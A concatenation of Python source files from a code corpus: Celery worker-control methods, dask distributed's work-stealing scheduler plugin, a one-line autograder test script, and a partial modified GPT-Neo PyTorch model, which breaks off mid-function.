return self.app.amqp.TaskConsumer(conn).purge()
discard_all = purge
def election(self, id, topic, action=None, connection=None):
self.broadcast(
'election', connection=connection, destination=None,
arguments={
'id': id, 'topic': topic, 'action': action,
},
)
def revoke(self, task_id, destination=None, terminate=False,
signal=TERM_SIGNAME, **kwargs):
"""Tell all (or specific) workers to revoke a task by id.
If a task is revoked, the workers will ignore the task and
not execute it after all.
Arguments:
task_id (str): Id of the task to revoke.
terminate (bool): Also terminate the process currently working
on the task (if any).
signal (str): Name of signal to send to process if terminate.
Default is TERM.
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast('revoke', destination=destination, arguments={
'task_id': task_id,
'terminate': terminate,
'signal': signal,
}, **kwargs)
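    # Usage sketch (standard Celery API; the task id is a placeholder):
    #   app.control.revoke('d9078da5-9915-40a0-bfa1-392c7bde42ed',
    #                      terminate=True, signal='SIGKILL')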
def terminate(self, task_id,
destination=None, signal=TERM_SIGNAME, **kwargs):
"""Tell all (or specific) workers to terminate a task by id.
See Also:
This is just a shortcut to :meth:`revoke` with the terminate
argument enabled.
"""
return self.revoke(
task_id,
destination=destination, terminate=True, signal=signal, **kwargs)
def ping(self, destination=None, timeout=1.0, **kwargs):
"""Ping all (or specific) workers.
Returns:
List[Dict]: List of ``{'hostname': reply}`` dictionaries.
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast(
'ping', reply=True, arguments={}, destination=destination,
timeout=timeout, **kwargs)
def rate_limit(self, task_name, rate_limit, destination=None, **kwargs):
"""Tell workers to set a new rate limit for task by type.
Arguments:
task_name (str): Name of task to change rate limit for.
rate_limit (int, str): The rate limit as tasks per second,
or a rate limit string (`'100/m'`, etc.
see :attr:`celery.task.base.Task.rate_limit` for
more information).
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast(
'rate_limit',
destination=destination,
arguments={
'task_name': task_name,
'rate_limit': rate_limit,
},
**kwargs)
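    # Usage sketch (standard Celery API; task name and rate are placeholders):
    #   app.control.rate_limit('myapp.tasks.add', '200/m')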
def add_consumer(self, queue,
exchange=None, exchange_type='direct', routing_key=None,
options=None, destination=None, **kwargs):
"""Tell all (or specific) workers to start consuming from a new queue.
Only the queue name is required as if only the queue is specified
then the exchange/routing key will be set to the same name (
like automatic queues do).
Note:
This command does not respect the default queue/exchange
options in the configuration.
Arguments:
queue (str): Name of queue to start consuming from.
exchange (str): Optional name of exchange.
            exchange_type (str): Type of exchange (defaults to 'direct').
routing_key (str): Optional routing key.
options (Dict): Additional options as supported
                by :meth:`kombu.entity.Queue.from_dict`.
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast(
'add_consumer',
destination=destination,
arguments=dict({
'queue': queue,
'exchange': exchange,
'exchange_type': exchange_type,
'routing_key': routing_key,
}, **options or {}),
**kwargs
)
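    # Usage sketch (standard Celery API; queue and worker names are placeholders):
    #   app.control.add_consumer('priority_high', reply=True)
    #   app.control.add_consumer('priority_high', destination=['[email protected]'])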
def cancel_consumer(self, queue, destination=None, **kwargs):
"""Tell all (or specific) workers to stop consuming from ``queue``.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'cancel_consumer', destination=destination,
arguments={'queue': queue}, **kwargs)
def time_limit(self, task_name, soft=None, hard=None,
destination=None, **kwargs):
"""Tell workers to set time limits for a task by type.
Arguments:
task_name (str): Name of task to change time limits for.
soft (float): New soft time limit (in seconds).
hard (float): New hard time limit (in seconds).
**kwargs (Any): arguments passed on to :meth:`broadcast`.
"""
return self.broadcast(
'time_limit',
arguments={
'task_name': task_name,
'hard': hard,
'soft': soft,
},
destination=destination,
**kwargs)
def enable_events(self, destination=None, **kwargs):
"""Tell all (or specific) workers to enable events.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'enable_events', arguments={}, destination=destination, **kwargs)
def disable_events(self, destination=None, **kwargs):
"""Tell all (or specific) workers to disable events.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'disable_events', arguments={}, destination=destination, **kwargs)
def pool_grow(self, n=1, destination=None, **kwargs):
"""Tell all (or specific) workers to grow the pool by ``n``.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'pool_grow', arguments={'n': n}, destination=destination, **kwargs)
def pool_shrink(self, n=1, destination=None, **kwargs):
"""Tell all (or specific) workers to shrink the pool by ``n``.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'pool_shrink', arguments={'n': n},
destination=destination, **kwargs)
def autoscale(self, max, min, destination=None, **kwargs):
"""Change worker(s) autoscale setting.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'autoscale', arguments={'max': max, 'min': min},
destination=destination, **kwargs)
def shutdown(self, destination=None, **kwargs):
"""Shutdown worker(s).
See Also:
Supports the same arguments as :meth:`broadcast`
"""
return self.broadcast(
'shutdown', arguments={}, destination=destination, **kwargs)
def pool_restart(self, modules=None, reload=False, reloader=None,
destination=None, **kwargs):
"""Restart the execution pools of all or specific workers.
Keyword Arguments:
modules (Sequence[str]): List of modules to reload.
reload (bool): Flag to enable module reloading. Default is False.
reloader (Any): Function to reload a module.
destination (Sequence[str]): List of worker names to send this
command to.
See Also:
Supports the same arguments as :meth:`broadcast`
"""
return self.broadcast(
'pool_restart',
arguments={
'modules': modules,
'reload': reload,
'reloader': reloader,
},
destination=destination, **kwargs)
def heartbeat(self, destination=None, **kwargs):
"""Tell worker(s) to send a heartbeat immediately.
See Also:
Supports the same arguments as :meth:`broadcast`
"""
return self.broadcast(
'heartbeat', arguments={}, destination=destination, **kwargs)
def broadcast(self, command, arguments=None, destination=None,
connection=None, reply=False, timeout=1.0, limit=None,
callback=None, channel=None, pattern=None, matcher=None,
**extra_kwargs):
"""Broadcast a control command to the celery workers.
Arguments:
command (str): Name of command to send.
arguments (Dict): Keyword arguments for the command.
destination (List): If set, a list of the hosts to send the
command to, when empty broadcast to all workers.
connection (kombu.Connection): Custom broker connection to use,
if not set, a connection will be acquired from the pool.
reply (bool): Wait for and return the reply.
timeout (float): Timeout in seconds to wait for the reply.
limit (int): Limit number of replies.
callback (Callable): Callback called immediately for
each reply received.
pattern (str): Custom pattern string to match
matcher (Callable): Custom matcher to run the pattern to match
"""
with self.app.connection_or_acquire(connection) as conn:
arguments = dict(arguments or {}, **extra_kwargs)
if pattern and matcher:
# tests pass easier without requiring pattern/matcher to
# always be sent in
return self.mailbox(conn)._broadcast(
command, arguments, destination, reply, timeout,
limit, callback, channel=channel,
pattern=pattern, matcher=matcher,
)
else:
return self.mailbox(conn)._broadcast(
command, arguments, destination, reply, timeout,
limit, callback, channel=channel,
)
| 34.924843 | 79 | 0.593819 | [
"MIT"
] | DTrafford/IDPS | idps/lib/python3.7/site-packages/celery/app/control.py | 16,729 | Python |
from __future__ import annotations
import asyncio
import logging
from collections import defaultdict, deque
from math import log2
from time import time
from typing import Container
from tlz import topk
from tornado.ioloop import PeriodicCallback
import dask
from dask.utils import parse_timedelta
from .comm.addressing import get_address_host
from .core import CommClosedError
from .diagnostics.plugin import SchedulerPlugin
from .utils import log_errors, recursive_to_dict
# Stealing requires multiple network bounces and if successful also task
# submission which may include code serialization. Therefore, be very
# conservative in the latency estimation to suppress too aggressive stealing
# of small tasks
LATENCY = 0.1
logger = logging.getLogger(__name__)
LOG_PDB = dask.config.get("distributed.admin.pdb-on-err")
_WORKER_STATE_CONFIRM = {
"ready",
"constrained",
"waiting",
}
_WORKER_STATE_REJECT = {
"memory",
"executing",
"long-running",
"cancelled",
"resumed",
}
_WORKER_STATE_UNDEFINED = {
"released",
None,
}
class WorkStealing(SchedulerPlugin):
def __init__(self, scheduler):
self.scheduler = scheduler
# { level: { task states } }
self.stealable_all = [set() for i in range(15)]
# { worker: { level: { task states } } }
self.stealable = dict()
# { task state: (worker, level) }
self.key_stealable = dict()
self.cost_multipliers = [1 + 2 ** (i - 6) for i in range(15)]
self.cost_multipliers[0] = 1
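        # The multipliers grow geometrically with the level, e.g. level 1 ->
        # 1 + 2**-5 ~= 1.03, level 6 -> 2.0, level 14 -> 257.0 (level 0 is
        # clamped to 1 above).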
for worker in scheduler.workers:
self.add_worker(worker=worker)
self._callback_time = parse_timedelta(
dask.config.get("distributed.scheduler.work-stealing-interval"),
default="ms",
)
# `callback_time` is in milliseconds
self.scheduler.add_plugin(self)
self.scheduler.extensions["stealing"] = self
self.scheduler.events["stealing"] = deque(maxlen=100000)
self.count = 0
# { task state: <stealing info dict> }
self.in_flight = dict()
# { worker state: occupancy }
self.in_flight_occupancy = defaultdict(lambda: 0)
self._in_flight_event = asyncio.Event()
self.scheduler.stream_handlers["steal-response"] = self.move_task_confirm
async def start(self, scheduler=None):
"""Start the background coroutine to balance the tasks on the cluster.
Idempotent.
        The scheduler argument is ignored. It is merely required to satisfy the
        plugin interface. Since this class is simultaneously an extension, the
        scheduler instance is already registered during initialization
"""
if "stealing" in self.scheduler.periodic_callbacks:
return
pc = PeriodicCallback(
callback=self.balance, callback_time=self._callback_time * 1000
)
pc.start()
self.scheduler.periodic_callbacks["stealing"] = pc
self._in_flight_event.set()
async def stop(self):
"""Stop the background task balancing tasks on the cluster.
This will block until all currently running stealing requests are
finished. Idempotent
"""
pc = self.scheduler.periodic_callbacks.pop("stealing", None)
if pc:
pc.stop()
await self._in_flight_event.wait()
def _to_dict(self, *, exclude: Container[str] = ()) -> dict:
"""
A very verbose dictionary representation for debugging purposes.
        Not type stable and not intended for roundtrips.
Parameters
----------
exclude:
A list of attributes which must not be present in the output.
See also
--------
Client.dump_cluster_state
"""
return recursive_to_dict(
{
"stealable_all": self.stealable_all,
"stealable": self.stealable,
"key_stealable": self.key_stealable,
"in_flight": self.in_flight,
"in_flight_occupancy": self.in_flight_occupancy,
},
exclude=exclude,
)
def log(self, msg):
return self.scheduler.log_event("stealing", msg)
def add_worker(self, scheduler=None, worker=None):
self.stealable[worker] = [set() for i in range(15)]
def remove_worker(self, scheduler=None, worker=None):
del self.stealable[worker]
def teardown(self):
pcs = self.scheduler.periodic_callbacks
if "stealing" in pcs:
pcs["stealing"].stop()
del pcs["stealing"]
def transition(
self, key, start, finish, compute_start=None, compute_stop=None, *args, **kwargs
):
if finish == "processing":
ts = self.scheduler.tasks[key]
self.put_key_in_stealable(ts)
elif start == "processing":
ts = self.scheduler.tasks[key]
self.remove_key_from_stealable(ts)
d = self.in_flight.pop(ts, None)
if d:
thief = d["thief"]
victim = d["victim"]
self.in_flight_occupancy[thief] -= d["thief_duration"]
self.in_flight_occupancy[victim] += d["victim_duration"]
if not self.in_flight:
self.in_flight_occupancy.clear()
self._in_flight_event.set()
def recalculate_cost(self, ts):
if ts not in self.in_flight:
self.remove_key_from_stealable(ts)
self.put_key_in_stealable(ts)
def put_key_in_stealable(self, ts):
cost_multiplier, level = self.steal_time_ratio(ts)
if cost_multiplier is not None:
ws = ts.processing_on
worker = ws.address
self.stealable_all[level].add(ts)
self.stealable[worker][level].add(ts)
self.key_stealable[ts] = (worker, level)
def remove_key_from_stealable(self, ts):
result = self.key_stealable.pop(ts, None)
if result is None:
return
worker, level = result
try:
self.stealable[worker][level].remove(ts)
except KeyError:
pass
try:
self.stealable_all[level].remove(ts)
except KeyError:
pass
def steal_time_ratio(self, ts):
"""The compute to communication time ratio of a key
Returns
-------
cost_multiplier: The increased cost from moving this task as a factor.
For example a result of zero implies a task without dependencies.
level: The location within a stealable list to place this value
"""
split = ts.prefix.name
if split in fast_tasks:
return None, None
if not ts.dependencies: # no dependencies fast path
return 0, 0
ws = ts.processing_on
compute_time = ws.processing[ts]
if compute_time < 0.005: # 5ms, just give up
return None, None
nbytes = ts.get_nbytes_deps()
transfer_time = nbytes / self.scheduler.bandwidth + LATENCY
cost_multiplier = transfer_time / compute_time
if cost_multiplier > 100:
return None, None
level = int(round(log2(cost_multiplier) + 6))
if level < 1:
level = 1
return cost_multiplier, level
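    # Worked example with made-up numbers: a task whose compute_time is 1 s and
    # whose dependencies transfer in 0.2 s gets cost_multiplier = 0.2 and
    # level = int(round(log2(0.2) + 6)) = 4, i.e. a cheap-to-steal bucket.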
def move_task_request(self, ts, victim, thief) -> str:
try:
if ts in self.in_flight:
return "in-flight"
stimulus_id = f"steal-{time()}"
key = ts.key
self.remove_key_from_stealable(ts)
logger.debug(
"Request move %s, %s: %2f -> %s: %2f",
key,
victim,
victim.occupancy,
thief,
thief.occupancy,
)
victim_duration = victim.processing[ts]
thief_duration = self.scheduler.get_task_duration(
ts
) + self.scheduler.get_comm_cost(ts, thief)
self.scheduler.stream_comms[victim.address].send(
{"op": "steal-request", "key": key, "stimulus_id": stimulus_id}
)
self.in_flight[ts] = {
"victim": victim, # guaranteed to be processing_on
"thief": thief,
"victim_duration": victim_duration,
"thief_duration": thief_duration,
"stimulus_id": stimulus_id,
}
self._in_flight_event.clear()
self.in_flight_occupancy[victim] -= victim_duration
self.in_flight_occupancy[thief] += thief_duration
return stimulus_id
except CommClosedError:
logger.info("Worker comm %r closed while stealing: %r", victim, ts)
return "comm-closed"
except Exception as e:
logger.exception(e)
if LOG_PDB:
import pdb
pdb.set_trace()
raise
async def move_task_confirm(self, *, key, state, stimulus_id, worker=None):
try:
ts = self.scheduler.tasks[key]
except KeyError:
logger.debug("Key released between request and confirm: %s", key)
return
try:
d = self.in_flight.pop(ts)
if d["stimulus_id"] != stimulus_id:
self.log(("stale-response", key, state, worker, stimulus_id))
self.in_flight[ts] = d
return
except KeyError:
self.log(("already-aborted", key, state, stimulus_id))
return
thief = d["thief"]
victim = d["victim"]
logger.debug("Confirm move %s, %s -> %s. State: %s", key, victim, thief, state)
self.in_flight_occupancy[thief] -= d["thief_duration"]
self.in_flight_occupancy[victim] += d["victim_duration"]
if not self.in_flight:
self.in_flight_occupancy.clear()
self._in_flight_event.set()
if self.scheduler.validate:
assert ts.processing_on == victim
try:
_log_msg = [key, state, victim.address, thief.address, stimulus_id]
if ts.state != "processing":
self.log(("not-processing", *_log_msg))
old_thief = thief.occupancy
new_thief = sum(thief.processing.values())
old_victim = victim.occupancy
new_victim = sum(victim.processing.values())
thief.occupancy = new_thief
victim.occupancy = new_victim
self.scheduler.total_occupancy += (
new_thief - old_thief + new_victim - old_victim
)
elif (
state in _WORKER_STATE_UNDEFINED
or state in _WORKER_STATE_CONFIRM
and thief.address not in self.scheduler.workers
):
self.log(
(
"reschedule",
thief.address not in self.scheduler.workers,
*_log_msg,
)
)
self.scheduler.reschedule(key)
# Victim had already started execution
elif state in _WORKER_STATE_REJECT:
self.log(("already-computing", *_log_msg))
# Victim was waiting, has given up task, enact steal
elif state in _WORKER_STATE_CONFIRM:
self.remove_key_from_stealable(ts)
ts.processing_on = thief
duration = victim.processing.pop(ts)
victim.occupancy -= duration
self.scheduler.total_occupancy -= duration
if not victim.processing:
self.scheduler.total_occupancy -= victim.occupancy
victim.occupancy = 0
thief.processing[ts] = d["thief_duration"]
thief.occupancy += d["thief_duration"]
self.scheduler.total_occupancy += d["thief_duration"]
self.put_key_in_stealable(ts)
self.scheduler.send_task_to_worker(thief.address, ts)
self.log(("confirm", *_log_msg))
else:
raise ValueError(f"Unexpected task state: {state}")
except Exception as e:
logger.exception(e)
if LOG_PDB:
import pdb
pdb.set_trace()
raise
finally:
self.scheduler.check_idle_saturated(thief)
self.scheduler.check_idle_saturated(victim)
def balance(self):
s = self.scheduler
def combined_occupancy(ws):
return ws.occupancy + self.in_flight_occupancy[ws]
def maybe_move_task(level, ts, sat, idl, duration, cost_multiplier):
occ_idl = combined_occupancy(idl)
occ_sat = combined_occupancy(sat)
if occ_idl + cost_multiplier * duration <= occ_sat - duration / 2:
self.move_task_request(ts, sat, idl)
log.append(
(
start,
level,
ts.key,
duration,
sat.address,
occ_sat,
idl.address,
occ_idl,
)
)
s.check_idle_saturated(sat, occ=occ_sat)
s.check_idle_saturated(idl, occ=occ_idl)
with log_errors():
i = 0
idle = s.idle.values()
saturated = s.saturated
if not idle or len(idle) == len(s.workers):
return
log = []
start = time()
if not s.saturated:
saturated = topk(10, s.workers.values(), key=combined_occupancy)
saturated = [
ws
for ws in saturated
if combined_occupancy(ws) > 0.2 and len(ws.processing) > ws.nthreads
]
elif len(s.saturated) < 20:
saturated = sorted(saturated, key=combined_occupancy, reverse=True)
if len(idle) < 20:
idle = sorted(idle, key=combined_occupancy)
for level, cost_multiplier in enumerate(self.cost_multipliers):
if not idle:
break
for sat in list(saturated):
stealable = self.stealable[sat.address][level]
if not stealable or not idle:
continue
for ts in list(stealable):
if ts not in self.key_stealable or ts.processing_on is not sat:
stealable.discard(ts)
continue
i += 1
if not idle:
break
if _has_restrictions(ts):
thieves = [ws for ws in idle if _can_steal(ws, ts, sat)]
else:
thieves = idle
if not thieves:
break
thief = thieves[i % len(thieves)]
duration = sat.processing.get(ts)
if duration is None:
stealable.discard(ts)
continue
maybe_move_task(
level, ts, sat, thief, duration, cost_multiplier
)
if self.cost_multipliers[level] < 20: # don't steal from public at cost
stealable = self.stealable_all[level]
for ts in list(stealable):
if not idle:
break
if ts not in self.key_stealable:
stealable.discard(ts)
continue
sat = ts.processing_on
if sat is None:
stealable.discard(ts)
continue
if combined_occupancy(sat) < 0.2:
continue
if len(sat.processing) <= sat.nthreads:
continue
i += 1
if _has_restrictions(ts):
thieves = [ws for ws in idle if _can_steal(ws, ts, sat)]
else:
thieves = idle
if not thieves:
continue
thief = thieves[i % len(thieves)]
duration = sat.processing[ts]
maybe_move_task(
level, ts, sat, thief, duration, cost_multiplier
)
if log:
self.log(log)
self.count += 1
stop = time()
if s.digests:
s.digests["steal-duration"].add(stop - start)
def restart(self, scheduler):
for stealable in self.stealable.values():
for s in stealable:
s.clear()
for s in self.stealable_all:
s.clear()
self.key_stealable.clear()
def story(self, *keys):
keys = {key.key if not isinstance(key, str) else key for key in keys}
out = []
for _, L in self.scheduler.get_events(topic="stealing"):
if not isinstance(L, list):
L = [L]
for t in L:
if any(x in keys for x in t):
out.append(t)
return out
def _has_restrictions(ts):
"""Determine whether the given task has restrictions and whether these
restrictions are strict.
"""
return not ts.loose_restrictions and (
ts.host_restrictions or ts.worker_restrictions or ts.resource_restrictions
)
def _can_steal(thief, ts, victim):
"""Determine whether worker ``thief`` can steal task ``ts`` from worker
``victim``.
Assumes that `ts` has some restrictions.
"""
if (
ts.host_restrictions
and get_address_host(thief.address) not in ts.host_restrictions
):
return False
elif ts.worker_restrictions and thief.address not in ts.worker_restrictions:
return False
if victim.resources is None:
return True
for resource, value in victim.resources.items():
try:
supplied = thief.resources[resource]
except KeyError:
return False
else:
if supplied < value:
return False
return True
fast_tasks = {"split-shuffle"}
| 34.15942 | 88 | 0.537123 | [
"BSD-3-Clause"
] | ncclementi/distributed | distributed/stealing.py | 18,856 | Python |
#!/usr/bin/env python
# Solution for the test LAB
print("Solucionado")
| 17.75 | 27 | 0.732394 | [
"Apache-2.0"
] | ManuelLecaro/simplePythonAutograderAutolab | autograder_test/src/test.py | 71 | Python |
# coding=utf-8
# Copyright 2021 The Eleuther AI and HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch GPT Neo model. """
"""Modified from the original at transformers library @ commit b24ead87e1be6bce17e4ec5c953b6d028e4b3af7 -nost"""
import os
from typing import Tuple
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss
from transformers.activations import ACT2FN
from transformers.file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward
from transformers.modeling_outputs import (
BaseModelOutputWithPast,
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
CausalLMOutputWithPast,
)
from transformers.modeling_utils import PreTrainedModel
from transformers.utils import logging
from transformers.models.gpt_neo.configuration_gpt_neo import GPTNeoConfig
from transformer_utils.partial_forward import AfterStoppingPointException
class LazyLinearAPICompatible(nn.LazyLinear):
def __init__(self, in_features: int, out_features: int, bias: bool = True) -> None:
super().__init__(out_features=out_features, bias=bias)
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "GPTNeoConfig"
_TOKENIZER_FOR_DOC = "GPT2Tokenizer"
GPT_NEO_PRETRAINED_MODEL_ARCHIVE_LIST = [
"EleutherAI/gpt-neo-1.3B",
# See all GPTNeo models at https://huggingface.co/models?filter=gpt_neo
]
_CHECKPOINT_FOR_DOC = "EleutherAI/gpt-neo-1.3B"
def load_tf_weights_in_gpt_neo(model, config, gpt_neo_checkpoint_path):
"""Load tf checkpoints in a pytorch model"""
try:
import re
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(gpt_neo_checkpoint_path)
logger.info(f"Converting TensorFlow checkpoint from {tf_path}")
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
if "global_step" not in name and "adam" not in name:
array = tf.train.load_variable(tf_path, name)
array = tf.dtypes.cast(array.squeeze(), tf.float32).numpy()
name = name.replace("attn/q", "attn/attention/q_proj/w")
name = name.replace("attn/k", "attn/attention/k_proj/w")
name = name.replace("attn/v", "attn/attention/v_proj/w")
name = name.replace("attn/o", "attn/attention/out_proj/w")
name = name.replace("norm_1", "ln_1")
name = name.replace("norm_2", "ln_2")
name = name.replace("attn/compute_output_bias/o_b", "attn/attention/out_proj/b")
name = name.replace("conv1d_main/c_fc/kernel", "c_fc/w")
name = name.replace("conv1d_main/c_fc/bias", "c_fc/b")
name = name.replace("conv1d_main/c_proj/kernel", "c_proj/w")
name = name.replace("conv1d_main/c_proj/bias", "c_proj/b")
names.append(name)
arrays.append(array)
for name, array in zip(names, arrays):
name = name[5:] # skip "gpt2/"
name = name.split("/")
pointer = model.transformer
for m_name in name:
if re.fullmatch(r"[A-Za-z]+\d+", m_name):
scope_names = re.split(r"(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "w" or scope_names[0] == "g":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "b":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "wpe" or scope_names[0] == "wte":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
else:
pointer = getattr(pointer, scope_names[0])
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if name[-1] == "w" and name[-2] in ["out_proj", "k_proj", "q_proj", "v_proj", "c_proj", "c_fc"]:
array = array.transpose()
if name == ["wte"]:
# if vocab is padded, then trim off the padding embeddings
array = array[: config.vocab_size]
try:
assert (
pointer.shape == array.shape
), f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched {name}"
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
print(f"Initialize PyTorch weight {name}")
pointer.data = torch.from_numpy(array)
# init the final linear layer using word embeddings
embs = model.transformer.wte.weight
lin = LazyLinearAPICompatible(embs.size()[1], embs.size()[0], bias=False)
lin.weight = embs
model.set_output_embeddings(lin)
return model
class GPTNeoAttentionMixin:
"""
A few attention related utilities for attention modules in GPT Neo, to be used as a mixin.
"""
def _split_heads(self, tensor, num_heads, attn_head_size):
"""
Splits hidden_size dim into attn_head_size and num_heads
"""
new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
tensor = tensor.view(*new_shape)
if len(tensor.shape) == 5:
return tensor.permute(0, 1, 3, 2, 4) # (batch, blocks, head, block_length, head_features)
elif len(tensor.shape) == 4:
return tensor.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
else:
raise ValueError(f"Input tensor rank should be one of [4, 5], but is: {len(tensor.shape)}")
def _merge_heads(self, tensor, num_heads, attn_head_size):
"""
Merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
if len(tensor.shape) == 5:
tensor = tensor.permute(0, 1, 3, 2, 4).contiguous()
elif len(tensor.shape) == 4:
tensor = tensor.permute(0, 2, 1, 3).contiguous()
else:
raise ValueError(f"Input tensor rank should be one of [4, 5], but is: {len(tensor.shape)}")
new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
return tensor.view(new_shape)
def _attn(self, query, key, value, causal_mask, masked_bias, attn_dropout, attention_mask=None, head_mask=None):
# Keep the attention weights computation in fp32 to avoid overflow issues
query = query.to(torch.float32)
key = key.to(torch.float32)
# print(("query", query.shape, "key", key.transpose(-1, -2).shape))
attn_weights = torch.matmul(query, key.transpose(-1, -2))
attn_weights = torch.where(causal_mask, attn_weights, masked_bias.to(attn_weights.dtype))
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
attn_weights = attn_weights.to(value.dtype)
attn_weights = attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
class GPTNeoSelfAttention(nn.Module, GPTNeoAttentionMixin):
def __init__(self, attention_type, config):
super().__init__()
self.window_size = None
max_positions = config.max_position_embeddings
bias = torch.tril(torch.ones((max_positions, max_positions), dtype=torch.uint8)).view(
1, 1, max_positions, max_positions
).bool()
if attention_type == "local":
self.register_buffer(
"bias",
bias ^ torch.tril(bias, -config.window_size),
)
else:
self.register_buffer(
"bias",
bias,
)
self.register_buffer("masked_bias", torch.tensor(-1e9))
self.attn_dropout = nn.Dropout(config.attention_dropout)
self.resid_dropout = nn.Dropout(config.resid_dropout)
self.embed_dim = config.hidden_size
self.num_heads = config.num_heads
self.head_dim = self.embed_dim // self.num_heads
if self.head_dim * self.num_heads != self.embed_dim:
raise ValueError(
f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {self.num_heads})."
)
self.k_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=False)
self.v_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=False)
self.q_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=False)
self.out_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=True)
def forward(
self,
hidden_states,
attention_mask=None,
layer_past=None,
head_mask=None,
use_cache=False,
output_attentions=False,
):
query = self.q_proj(hidden_states)
key = self.k_proj(hidden_states)
value = self.v_proj(hidden_states)
query = self._split_heads(query, self.num_heads, self.head_dim)
key = self._split_heads(key, self.num_heads, self.head_dim)
value = self._split_heads(value, self.num_heads, self.head_dim)
if layer_past is not None:
past_key = layer_past[0]
past_value = layer_past[1]
key = torch.cat((past_key, key), dim=-2)
value = torch.cat((past_value, value), dim=-2)
if use_cache is True:
present = (key, value)
else:
present = None
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length]
attn_output, attn_weights = self._attn(
query, key, value, causal_mask, self.masked_bias, self.attn_dropout, attention_mask, head_mask
)
attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
attn_output = self.out_proj(attn_output)
attn_output = self.resid_dropout(attn_output)
outputs = (attn_output, present)
if output_attentions:
outputs += (attn_weights,)
return outputs # a, present, (attentions)
class GPTNeoAttention(nn.Module):
def __init__(self, config, layer_id=0):
super().__init__()
self.layer_id = layer_id
self.attention_layers = config.attention_layers
self.attention_type = self.attention_layers[layer_id]
if self.attention_type in ["global", "local"]:
self.attention = GPTNeoSelfAttention(self.attention_type, config)
else:
raise NotImplementedError(
"Only attn layer types 'global' and 'local' exist, but got `config.attention_layers`: "
f"{config.attention_layers}. Select attn layer types from ['global', 'local'] only."
)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
use_cache=False,
output_attentions=False,
):
outputs = self.attention(
hidden_states,
attention_mask=attention_mask,
layer_past=layer_past,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
return outputs
class GPTNeoMLP(nn.Module):
def __init__(self, intermediate_size, config): # in MLP: intermediate_size= 4 * hidden_size
super().__init__()
embed_dim = config.hidden_size
self.c_fc = LazyLinearAPICompatible(embed_dim, intermediate_size)
self.c_proj = LazyLinearAPICompatible(intermediate_size, embed_dim)
self.act = ACT2FN[config.activation_function]
self.dropout = nn.Dropout(config.resid_dropout)
def forward(self, hidden_states):
hidden_states = self.c_fc(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.c_proj(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
class GPTNeoBlock(nn.Module):
def __init__(self, config, layer_id):
super().__init__()
hidden_size = config.hidden_size
inner_dim = config.intermediate_size if config.intermediate_size is not None else 4 * hidden_size
self.ln_1 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.attn = GPTNeoAttention(config, layer_id)
self.ln_2 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.mlp = GPTNeoMLP(inner_dim, config)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
use_cache=False,
output_attentions=False,
):
residual = hidden_states
hidden_states = self.ln_1(hidden_states)
attn_outputs = self.attn(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
attn_output = attn_outputs[0] # output_attn: a, present, (attentions)
outputs = attn_outputs[1:]
# residual connection
hidden_states = attn_output + residual
residual = hidden_states
hidden_states = self.ln_2(hidden_states)
feed_forward_hidden_states = self.mlp(hidden_states)
# residual connection
